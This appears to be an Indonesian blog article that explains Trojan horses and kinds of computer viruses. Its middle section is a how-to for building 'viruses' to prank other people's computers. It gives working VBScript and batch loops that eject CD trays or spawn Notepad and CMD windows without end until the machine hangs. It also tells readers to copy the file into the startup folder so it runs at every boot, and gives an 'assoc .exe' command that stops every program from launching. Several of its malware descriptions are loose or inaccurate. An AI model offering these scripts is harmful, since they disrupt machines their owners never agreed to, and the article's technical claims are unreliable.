Apa Itu Trojan Horse
Trojan horse atau biasa disebut Trojan adalah salah satu jenis malware yang sering menyamar sebagai software/perangkat lunak yang sah. Trojan horse ini biasa digunakan oleh para peretas untuk mendapatkan akses kepada sistem tanpa diketahui. Trojan horse ini menyamar seperti kebanyakan software lainnya yang ada di komputer, kemudian setelah diaktifkan tanpa sengaja oleh user barulah Trojan ini mulai bekerja. Ada beberapa tindakan yang bisa dilakukan oleh malware Trojan horse seperti berikut ini :
- Hapus data
- Blokir data
- Modifikasi data
- Copy data
- Menganggu kinerja komputer
- Menganggu kinerja jaringan
Sejarah Trojan Horse
Patung Kuda Trojan Horse
Sejarah penamaan Trojan horse berasal dari cerita perang Troya, Trojan horse adalah strategi orang-orang Yunani yang digunakan untuk memasuki kota Troy dengan cara licik. Orang-orang Yunani membangun patung kuda kayu besar dengan menyembunyikan pasukan-pasukan hebatnya di dalam patung kuda. Orang-orang Yunani berpura-pura berlayar menuju Troy dengan membawa patung kuda kayu tersebut, orang Yunani menarik kuda tersebut sampai ke benteng kota Troy sebagai hadiah kemenangan perang.
Nah saat malam tiba semuanya sudah pergi, pasukan Yunani yang ada didalam kuda tersebut keluar dan membuka gerbang utama agar pasukan Yunani yang tadi bersama naik kapal agar bisa masuk dan menyerang kota Troy. Secara singkatnya Trojan horse juga memiliki triks seperti itu untuk masuk ke sistem komputer, salah satunya ikut di software-software yang di download dari website di internet. Makanya untuk Anda yang suka download perlu hati-hati siapa tahu ada malware Trojan yang ikut terinstall.
Serangan Trojan Horse
Serangan Trojan horse ada berbagai macam jenis, tetapi kesemuanya memang tujuannya untuk kejahatan. Akibat paling banyak dan mudah ditemui adalah kinerja komputer yang semakin lemot dan akses jaringan komputer yang semakin melambat. Selain itu Anda perlu selalu waspada karena Trojan horse juga mengincar data-data sensitive yang ada pada komputer yang bisa dengan mudah dicuri melalui malware yang sudah tertanam dikomputer.
Diambil dari website Kaspersky, Trojan dikelompokan sesuai dengan jenis tindakan yang dilakukan seperti:
- Backdoor, Trojan backdoor memungkinkan mereka melakukan tindakan apa saja kepada komputer yang sudah terinfeksi seperti mengirim, menerima, upload, hapus, reboot komputer dan tindakan lainnya tanpa sepengetahuan pemilik.
- Exploit, Trojan yang berisi data atau kode yang masuk melalui kerentanan perangkat lunak aplikasi yang terinstall.
- Rootkit, rootkit adalah sejenis Trojan yang dirancang untuk menyembunyikan aktifitas tertentu pada sistem sehingga menjadi berat dan lemot.
- Trojan banker, Trojan banker adalah salah satu malware yang menyerang pada akun-akun perbankan online, pembayaran elektronik, kartu kredit, debit dan uang digital lainnya.
- Trojan DDoS, Trojan ini memiliki tugas untuk menyerang alamat website yang sudah menjadi target.
- Trojan Downloader, Trojan yang masuk bareng dengan software yang Anda install termasuk adanya adware dan iklan-iklan tidak jelas.
Selain itu masih ada jenis Trojan lainnya yang memiliki fungsi hampir sama satu dengan lainnya yaitu Trojan Dropper, Trojan FakeAV, Trojan GameThief, Trojan IM, Trojan Ransom, Trojan SMS, Trojan Spy dan Trojan Mailfinder.
Virus Membuka Tutup CD/DVD room
------------------------------------------------------
Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop
------------------------------------------------------
simpan di Notepad kode warna kuning tersebut dengan nama : Terserah-anda.vbs
type file : All File
maka DVD/CD roomnya akan membuka dan menutup otomatis
Membuat virus agar Komputer Hank sebab Notepad terbuka terus menerus
------------------------------------------------------------
@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top
------------------------------------------------------------
simpan kode berwarna Merah tersebut di Notepad dengan nama : Terserah anda.bat
maka Notepad akan terbuka terus menerus
Membuat CMD Terbuka terus menerus Menggunakan Notepad
-------------------------------------------------------------
start
start
start
start
start
start
start
start
start
start
start
start
-----------------------------------------------------------
simpan di Notepad dengan nama : Terserah Anda.bat
NB:semakin banyak kata start tertulis di notepad tersebut,maka begitu pula banyaknya CMD terbuka secara terus menerus
Selanjutnya saya akan membahas perintah Start, tentu saja yang menjadi dasar pembuatan Virus, perintah ini berfungsi untuk memulai/memanggil sebuah program, misalnya ingin memanggil Firefox, anda tinggal ketikan pada CMD “start firefox.exe”. mudah kan, nah sekarang kita masuk pada pembuatan virus tahap awal akan saya beri skripnya.
-----------------------------------------------------------
start
:1
start
goto :1
-----------------------------------------------------------
*Penjelasan Skript
@echo off :untuk menyembunyikan skript
start : untuk memulai program CMD
goto: untuk menuju suatu perintah
:1 : Variable
Pembuat Virus tidak ingin skriptnya diketahui oleh korban jadi dia memberi skript echo off untuk menyembunyikan skript. dan :1 untuk menggantikan perintah start yang variable , karena jika tetap ditulis “goto start” maka akan dianggap 2 perintah. jika ditulis goto :1 akan dianggap 1 perintah yang berfungsi untuk mengulang perintah start. perintah start sendiri karena di ujung perintah tidak ditulis program lain, jadi berfungsi memulai/membuka CMD.
Langkah-langkah
1. Buka Notepad.exe
2. Copy Skript yang saya buat
3.Pastekan di Notepad
4.Klik Save As pada menu File
5.Ubah Save as Type menjadi all files
6.Save dengan nama Hx~Start.bat (format harus .bat)
7.Klik Sav
Mengcopy file virus ke folder startup, agar virus otomatis running
RUN ==> shell:startup
=====================================================================
Membuat file exe tidak dapat dioperasikan di windows
Ini adalah cara bagi kalian yang pingin isengin komputer/laptop temen kalian. Ini adalah cara untuk membuat file exe tidak dikenali oleh windows. Secara abstract bisa dikatakan apabila kita akan membuka suatu aplikasi maka akan muncul popup yang akan menyuruh kita untuk membuka file melalui web atau memilih suatu program untuk membuka file tersebut. Dengan kata lain windows teman kita hanya akan menjadi suatu barang yang akan tiada gunanya. Sebagian orang pasti akan mengambil jalan untuk menginstal ulang. Namun dalam hal ini bukan merupakan sebuah virus jadi memperbaikinya bisa secara langsung. Oke, Sekarang kita masuk ke pembahasan inti, berikut step by stepnya :
Buka Start – Run – kemudian ketik cmd
Pada window cmd masukkan perintah assoc .exe=hank
Tutup jendela cmd dan coba aktifkan satu aplikasi. Sudah bisa dipastikan aplikasi tersebut tidak akan bisa dijalankan.
Untuk mengembalikan seperti semula Anda tidak bisa menggunakan cmd namun untuk menormalkannya lagi Anda harus menggunakan Command Prompt. Lakukan cara seperti langkah pertama namun keywordnya diganti dengan command prompt.
Setelah itu masukkan perintah assoc .exe=exefile
Alhasil semua aplikasi dapat dijalankan kembali.
NB : cmd adalah sebuah aplikasi command prompt DOS yang berextensikan .exe sedangkan command prompt adalah command prompt DOS yang berextensikan .com. Oleh karena itu command prompt masih dapat digunakan karena tidak berextensi .exe
=====================================================================
Jenis virus komputer dari cara kerjanya
Dari cara kerjanya, jenis virus komputer dikategorikan sebagai berikut:
Worm
Worm merupakan virus komputer yang tidak terlalu berbahaya. Namun apabila dibiarkan terus menerus, maka virus ini dapat membuat penyimpanan komputer penuh dengan cepat dan membuat sistem komputer menjadi rapuh.
Virus ini dapat menggandakan diri dengan cepat dan dapat membuat file acak tak berguna pada komputer. Hal inilah yang menyebabkan memori dan hardisk akan penuh dengan virus ini.
Virus worm ini dapat menginfeksi komputer yang menggunakan email dan terhubung dalam jaringan internet, hal ini sama dengan yang dilakukan oleh virus Trojan.
Trojan
Jenis virus komputer ini dibuat dengan kemampuan mengontrol, mengendalikan data atau bahkan mencuri data yang ada pada komputer. Sama halnya dengan virus Worm, virus Trojan ini biasa muncul melalui jaringan internet dan juga email yang diterima oleh pengguna serta data pribadi yang tidak di-password.
Tujuan dari Trojan adalah memperoleh informasi dari target seperti password, kebiasaan user yang tercatat dalam system log, data, dan mengendalikan target.
Backdoor
Backdoor merupakan jenis virus komputer yang hampir sama dengan trojan. Namun, Backdoor bisanya menyerupai file yang baik-baik saja misalnya game.
Backdoor merujuk kepada mekanisme yang dapat digunakan untuk mengakses sistem, aplikasi, atau jaringan, selain dari mekanisme yang umum digunakan seperti melalui proses logon atau proses autentikasi lainnya.
Virus komputer yang berbahaya
Spyware
Spyware merupakan jenis virus komputer yang bekerja untuk memantau komputer yang terinfeksi. Spyware merupakan turunan dari perangkat lunak beriklan, yang memantau kebiasaan pengguna dalam melakukan penjelajahan Internet untuk mendatangkan banyak iklab kepada pengguna.
Tetapi, karena perangkat lunak beriklan kurang begitu berbahaya karena tidak melakukan pencurian data, spyware melakukannya dan mengirimkan hasil yang dikumpulkan kepada pembuatnya.
Spyware dapat menimbulkan kerugian seperti pencurian data, tambahan biaya internet dan membuat koneksi internet semakin lambat.
Rogue
Rogue merupakan program yang meniru program antivirus dan menampilkan aktivitas layaknya antivirus normal, dengan memberikan peringatan-peringatan palsu tentang adanya virus.
Tujuannya adalah agar pengguna membeli dan mengaktivasi program antivirus palsu itu dan mendatangkan uang bagi pembuat virus rogue tersebut. Juga rogue dapat membuka celah keamanan dalam komputer guna mendatangkan jenis virus lain.
Rootkit
Rootkit adalah kumpulan perangkat lunak yang bertujuan untuk menyembunyikan proses, berkas dan data sistem yang sedang berjalan dari sebuah sistem operasi tempat dia bernaung. Rootkit awalnya berupa aplikasi yang tidak berbahaya, tetapi belakangan ini telah banyak digunakan oleh perangkat perusak yang ditujukan untuk membantu penyusup menjaga tindakan mereka yang ke dalam sistem agar tidak terlacak.
Rootkit hadir di beragam sistem operasi seperti, Linux, Solaris dan Microsoft Windows. Kit-akar ini sering mengubah bagian dari sistem operasi dan juga memasang dirinya sendiri sebagai penggerak atau modul inti.
Jenis virus komputer lainnya yang sering ditemui
:strip_icc():format(webp)/kly-media-production/medias/2753923/original/093950800_1552888454-iStock-898222360.jpg)
Web Scripting Virus
Web Scripting merupakan sebuah kode program yang dipakai untuk mengoperasikan konten yang terdapat dalam sebuah website. Namun virus ini sering muncul saat sebuah komputer terhubung dengan internet dan mengganggu program-program yang ada pada komputer. Sehingga inilah yang membuat Web Scripting digolongkan sebagai virus.
Multipartite Virus
Virus ini bersembunyi di dalam RAM yang tentunya dapat menginfeksi sistem operasi pada program tertentu. Jika tidak segera diatasi, maka virus ini akan merambah pada bagian hardisk. Multipartite virus ini memiliki kemampuan menyerang komputermu dengan sangat cepat. Hal ini dinilai akan sangat membahayakan kesehatan RAM dan juga hardisk komputer. Efek yang ditimbulkan bila komputermu terdapat Multipartite virus ialah secara otomatis akan memformat hardisk sehingga membuat beberapa aplikasi tidak dapat dibuka.
Memory Resident Virus
Seperti namanya, Memory Resident Virus merupakan salah satu dari virus yang diciptakan untuk menginfeksi memori RAM. Efek yang ditimbulkan dari virus ini ialah akan membuat kinerja komputer sangat lambat dan menginfeksi program-program komputer.
Jenis virus ini akan secara otomatis aktif saat kondisi komputer dinyalakan. Keberadaan virus ini akan membuat kinerja program pada komputer bekerja tidak normal. Untuk mengatasi Memory Resident Virus ini, Anda hanya perlu menggunakan antivirus seperti Avast, Smadav, Avira ataupun antivirus sejenisnya.
FAT Virus
FAT Virus atau File Allocation Table merupakan virus yang mampu merusak file-file tertentu. Virus ini biasa bersembunyi di tempat penyimpanan data pribadi. Kemampuan dari virus ini ialah dapat menyembunyikan file penting, seolah-olah file tersebut hilang atau terhapus.
Directory Virus
Virus ini merupakan jenis virus yang dapat menginfeksi file berekstensi .exe. File yang memiliki ekstensi tersebut akan hilang ataupun error tanpa alasan saat sedang atau akan dioperasikan. Saat sistem kerja pada file berformat .exe ini bekerja, maka Directory Virus ini pun akan aktif dan dapat menginfeksi file lainnya.
Jika virus ini sudah mulai menyebar, maka kemungkinan komputer akan melambat dan banyak program yang tidak dapat dibuka. Directory virus ini sendiri tidak akan mempan jika hanya dibersihkan atau melakukan scan secara rutin menggunakan antivirus yang biasa digunakan. Salah satu caranya ialah dengan menginstal ulang sistem operasi pada komputer serta mengformat hardisk pada komputermu.
Companion Virus
Companion virus merupakan jenis virus komputer yang dapat mengganggu data-data pribadi pemilik komputer. Virus jenis ini akan bersembunyi di dalam hardisk serta sulit untuk mendeteksinya. Kemampuan Companion virus ialah merusak format data menjadi format data palsu dengan .com ataupun .Apk. Virus ini biasanya berkumpul dengan file yang baru dibuat. Cara mengatasi jenis virus komputer ini pun hanya bisa dicegah dengan menginstal dan membersihkan secara rutin dengan antivirus